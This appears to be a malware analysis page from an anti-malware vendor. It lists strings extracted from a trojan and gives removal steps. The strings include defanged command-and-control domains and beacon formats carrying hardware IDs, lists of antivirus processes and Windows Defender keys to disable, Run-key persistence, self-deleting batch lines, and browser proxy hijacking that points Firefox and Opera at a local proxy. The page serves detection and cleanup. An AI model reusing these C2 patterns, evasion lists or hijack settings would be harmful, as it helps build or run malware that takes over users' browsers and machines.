GetProcessWindowStation
operator
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
inflate 1.2.5 Copyright 1995-2010 Mark Adler
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
\sc.exe
ntdll.dll
iexplore.exe
opera.exe
firefox.exe
safari.exe
chrome.exe
AVGIDSMonitor.exe
AVGIDSAgent.exe
avgchsvx.exe
avgemcx.exe
avgnsx.exe
avgrsx.exe
avgtray.exe
avgwdsvc.exe
avgnt.exe
ccsvchst.exe
AvastUI.exe
mcagent.exe
SOFTWARE\Microsoft\Windows Defender\Real-Time Protection
SOFTWARE\Microsoft\Windows Defender
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
explorer.exe
Windows Security Center
%s\shell32.dll,Control_RunDLL "%s\wscui.cpl",Security Center
rundll32.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows Defender
at %d:%d "%s" %s
win32iexplore.exe
win32opera.exe
win32firefox.exe
win32safari.exe
win32winword.exe
win32excel.exe
win32outlook.exe
win32photoshop.exe
win32wmplayer.exe
win32java.exe
win32itunes.exe
win32msmsgs.exe
java.exe
*.log
%s:\windows\system32\%s.tmp
%s:\windows\syswow64\%s.tmp
%s:\WINNT\system32\%s.tmp
%s:\WINNT\syswow64\%s.tmp
Find Temporary files is %d
cannot open files %s, Open next files ?
{A1D429DE-B782-4253-84AD-6E09A8438AD5}
\Windows NT
Software\Microsoft\Windows\CurrentVersion\Run
%s\%s
%s.%s
stor.cfg
exec%s
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
lvvm.exe
{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}
{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}
{6B985724-623F-492e-B0D6-C9715ADE853B}
{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}
Advapi32.dll
%s%s_1
%s_0_%d_%s
%s_%d
%s_%d_%d_%d_%d
%s_%s
hXXp://
POST %s HTTP/1.1
Host: %s
User-Agent: mozilla/2.0
Content-Length: %u
POST hXXp://%s%s HTTP/1.1
HTTP/1.0 200 OK
HTTP/1.1 200 OK
id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=109
%s_%s_%d
_1_%d
_2_%d
_3_%d
_4_%d
hXXp://ourthreedomains.com
hXXp://webhomefordomains.com
hXXp://storetabletpcforme.com
hXXp://seeworldonlines.com
hXXp://adreklamaforyou.com
hXXp://calcfordelis.com
hXXp://stotre4image.com
hXXp://allsoft4you.com
hXXp://videocontainer.com
hXXp://maxtroeurosys.com
SELECT_RESERV_SRV_%d
%s_%d_%s
id=%s&c=%d
%s_%d_%d_%d
%s_%d_%d
%s %s
%s start%s%c%s
c1.exe
c2.exe
c3.exe
%sq=%s
DWN_CON_STRP_%d_%s
hXXp://%d.ctrl.%s
logo.png
img/135.png
img/136.png
t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d
t=%s&q=&s=%d&hrs=%d
%s/%s?tq=%s&pr=%d
%s:%d/%s?tq=%s&pr=%d
hXXp://armoredlegion.com/305986.png
hXXp://armoredlegion.com/16354.png
hXXp://armoredlegion.com/716354_m61.png
hXXp://mektek.net/thelab/wiley.jpg
hXXp://knowledgesutra.com/img/temp/hi.cgi
hXXp://knowledgesutra.com/img/temp/head.png
hXXp://battleon.com/134.gif
hXXp://battleon.com/132.gif
hXXp://battleon.com/133.gif
hXXp://browsermmorpg.com/images/cpc.png
hXXp://browsermmorpg.com/images/cpc2.png
hXXp://browsermmorpg.com/img/intel.gif
hXXp://browsermmorpg.com/img/intel.jpg
hXXp://012webpages.com/christian12.jpg
hXXp://012webpages.com/christian13.jpg
hXXp://012webpages.com/christian14.jpg
hXXp://tri-countymech.com/g/livechat.png
hXXp://tri-countymech.com/g/logo.png
hXXp://tri-countymech.com/g/133.jpg
hXXp://tri-countymech.com/g/134.jpg
hXXp://electronicstheory.com/pics/valley.png
hXXp://electronicstheory.com/pics/sun.png
hXXp://classicbattletech.com/lhous3.gif
hXXp://classicbattletech.com/lhous4.gif
hXXp://classicbattletech.com/lhous5.gif
hXXp://classicbattletech.com/lhous6.gif
hXXp://engineeringcrossing.com/images/misc/23525.png
hXXp://engineeringcrossing.com/images/misc/64646.png
t=t&hrs=%d&q=id=1000&ver=%s&s=%d
t=ip&hrs=%d&q=&s=1
%s?pr=%s
\bl%d_64.bat
del "%s"
if exist "%s" goto a
cmd.exe /c "%s"
%s.zl
{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d
{C66E79CE-8935-4ed9-A6B1-4983619CB925}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
GET %s HTTP/1.0
drweb
{5A92A751-F926-4BB9-872E-BEC4A4CD571F}
ldr.ini
reportfrommains.com
hXXp://%s/s.php?c=121&id=%s
onlinereportsystem.com
%s_1_%d_%s
%s_2_%d_%s
%s_3_%d_%s
%s_4_%d_%s
pmv=2&id=%s&hwid=%s
u.exe
%s up%s
&%s=%s
PRM_LSTN_THIS_PORT
127.0.0.1
HTTP/1.x
google.com
hXXp://VVV.google.com
HTTP/1.1 302 Found
Location: %s
id=%s&type=%d&ppcid=%s
%s: %s
%s_5_%s
http=127.0.0.1:
prefs.js
Mozilla
"network.proxy.http"
"network.proxy.http_port"
"network.proxy.type"
"127.0.0.1"
%s(%s, %s);
operaprefs.ini
Opera
Use HTTP
HTTP server
127.0.0.1:%s
%s=%s
%s:%s
hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s
id=%s&hwid=%s
exec|%s
http=
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
bing.com
yahoo.com
search.aol.
suche.aol.
searcht2.aol.
.yimg.com
.bing.net
scorecardresearch.com
brightcove.com
.aol.
.atwola.
.ivwbox.
.google
.atdmt.
.abmr.
.tacoda.
.adtechus.
.autodatadirect.
.mapquestapi.
.ggpht.
.virtualearth.
.opera.
.microsoft.
.wsod.
.doubleclick.
.ypcdn.
.truveo.
.tlowdb.
mapq.st
.dartsearch.
.thawte.
http://
bing.com/search
search.yahoo.com/search
%s_1_%s
err%d%s_%d_%d
err0%s_%d_%d
&useragent=%s
&referer=%s
&type=%d
%s:443/?ver=109&system=%d&id=%s&hwid=%s&search=%s
%s_2_%s
%s_%s_%s
%s_3_%s
VVV.VVV.ru
hXXps://
.doubleclick.net
doubleclick.net
msn.com
%s_0%d_%d
=='undefined'?'%s':'%s'
.referrer
HTTP/1.0
User-Agent: chrome/9.0
%s %s %s
hXXp://VVV.google.com/
hXXp://VVV.yahoo.com/
.class
.midi
google_ad.url
google_ad.title
r.msn.com
google_ad.line1
zcÁ
c:\%original file name%.exe
%Program Files%\CF2C6
%Documents and Settings%\%current user%\Application Data\507CF
%Program Files%\LP\D1F5
GetCPInfo
GetProcessHeap
RegCreateKeyExA
RegCloseKey
RegOpenKeyExA
RegFlushKey
ShellExecuteA
SHDeleteKeyA
keybd_event
EnumChildWindows
EnumWindows
WinHttpOpenRequest
WinHttpQueryDataAvailable
WinHttpCloseHandle
WinHttpConnect
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpReadData
WinHttpOpen
.text
`.rdata
@.data
.rsrc
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
KERNEL32.DLL
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
PSAPI.DLL
RASAPI32.dll
RPCRT4.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
WINHTTP.dll
WININET.dll
WS2_32.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
mscoree.dll
WUSER32.DLL
\Registry\Machine\System\CurrentControlSet\Services\%s
Dr.Web
mhttp=127.0.0.1:%d
hXXp://VVV.yahoo.com
2.0.2.1


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    mscorsvw.exe:1912
    %original file name%.exe:1520
    %original file name%.exe:668

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %System%\config\SOFTWARE.LOG (3782 bytes)
    %System%\config\software (1617 bytes)
    %Program Files%\LP\D1F5\C29.exe (170514 bytes)
    %Program Files%\LP\D1F5\85.exe (43 bytes)
    %Documents and Settings%\%current user%\Application Data\507CF\F2C6.07C (5028 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "C29.exe" = "%Program Files%\LP\D1F5\C29.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now